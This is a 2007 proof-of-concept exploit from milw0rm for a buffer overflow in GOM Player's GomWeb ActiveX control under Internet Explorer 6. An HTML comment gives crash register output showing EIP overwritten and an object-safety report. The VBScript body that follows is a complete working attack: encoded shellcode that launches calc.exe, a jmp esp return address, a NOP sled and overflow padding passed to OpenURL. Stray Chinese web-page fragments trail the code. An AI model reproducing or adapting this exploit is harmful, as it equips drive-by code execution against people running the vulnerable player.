<!--
GOM Player 2.1.6.3499 GomWeb Control (GomWeb3.dll 1.0.0.12) remote buffer
overflow poc exploit (ie6/xp sp2)
quote from Wikipedia: "GOM Player(Gretech Online Movie Player) is South
Korea's most popular media player; as of July 2007, it had 8.4 million users,
compared to 5.4 million of Microsoft's Windows Media Player. Users most
commonly use the player to watch pornography..."
mphhh ...
passing more than 506 "A" to OpenUrl method:
EAX 00000000
ECX 7C80240F kernel32.7C80240F
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 00000000
ESP 0012CDD0 ASCII "AAAAAAAAAAAAAAAAAA...
EBP 0012DE08
ESI 003390B0
EDI 0000102A
EIP 41414141
object safety report:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
software site: http://www.gomplayer.com/main.html
rgod
site: http://retrogod.altervista.org
-->
<html>
<object classid='clsid:DC07C721-79E0-4BD4-A89F-C90871946A31' id='GomManager' /></object>
<script language='vbscript'>
//open calc.exe
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
eip = unescape("%67%31%41%7e") 'jmp esp kernel32.dll
nop = String(48, unescape("%90"))
sURL=String(506, "A") + eip + nop + scode
GomManager.OpenURL sURL
</script>
</html>
# milw0rm.com [2007-10-29]
扫一扫
5212
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
